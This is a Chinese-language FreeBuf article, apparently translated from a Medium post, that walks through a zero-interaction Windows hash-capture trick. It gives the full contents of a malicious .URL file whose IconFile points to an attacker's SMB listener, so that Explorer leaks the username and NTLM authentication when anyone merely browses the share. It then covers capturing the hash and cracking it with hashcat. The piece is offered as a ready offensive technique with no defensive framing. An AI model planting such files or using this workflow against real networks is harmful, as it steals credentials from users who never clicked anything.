freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

一种无需用户交互捕获哈希的方法
2018-10-07 07:00:13

这段时间我在微博上翻看了大量的帖子,其中有一篇来自@insertscript的帖子,介绍了一种无交互式抓取哈希值的技巧。其使用.URL文件访问环境变量,用户无需任何用户交互即可连接到攻击者的文件共享。

以下内容摘自@insertscript的帖子:

“只要explorer.exe的的查看包含.URL文件的文件夹,它就会在发送实际请求之前查找任何指定的环境变量,如%PATH%或%USERNAME%,从而将内容泄露给由攻击者控制的服务器。“(https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html

首先,我们在攻击机上设置SMBListener(通常情况下在内网环境中,大多数公司都会阻止SMB流量出站)。

1_fQk9ruNetDY_W2mjcmGuRw.png

接着,我们在文件共享上创建一个文本文件。(创建文件后,你可以将其放在任何共享上)。

2_ojHHReMZNe_wptxFkhJzUw.png

将以下内容粘贴到文本文件中:

[InternetShortcut]

URL=whatever

WorkingDirectory=whatever

IconFile=\\PutYourSmbListenerShareHere\%USERNAME%.icon

IconIndex=1

以上你只需将IconFile PATH替换为你在SMBServer,Responder或Inveigh中设置的共享即可。注意:这里的%USERNAME%。icon不要改动。如下:

1_QLEF1Z4Nxy-GQ-VfipqzJA.png

现在,请确保你已勾选文件名扩展和隐藏文件选项。

1_C8fpG9Vax8N9tqqbWXpE-Q.png

使用.URL扩展重命名文件注意:当使用相同文件名时,将导致无法正常工作因此,建议大家每次都只创建唯一的文件名(例如1.url,2.url等)!

1_M2cD10jjIKMqNFzhG_wP6g.png

重命名后应该看起来像下面这样:

1_3d_YzY0RiuFhM1A__jKwrA.png

此时,在你的smb listener应该已经获取到了一个连接!

1_1dLpEk4FL0MKuQsyTdQjxQ.png

现在,任何人只要访问该共享,都将尝试自动的向你的SMB listener进行身份验证。

复制哈希并使用hashcat破解。

1_fCcNzzty8DFieV3Rvc6JBA.png

将其粘贴到文件中

10_jGAre-VqZi-Qy2sGbsZ_Dg.png

启动hashcat(希望密码包含在你的字典列表中)

1_O4Yw2yBO-reeoKgTh5l7nw.png

成功解出了密码!

1_pWAvweKQObHkYcCPR5aiNA.png

最后,感谢@insertscript的分享!也希望大家可以在微博上关注我(@_markmo_),我会第一时间向大家分享我学到的东西,就像其他人给予我的一样!

*参考来源:medium,FB小编secist编译,转载请注明来自FreeBuf.COM

# 哈希
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者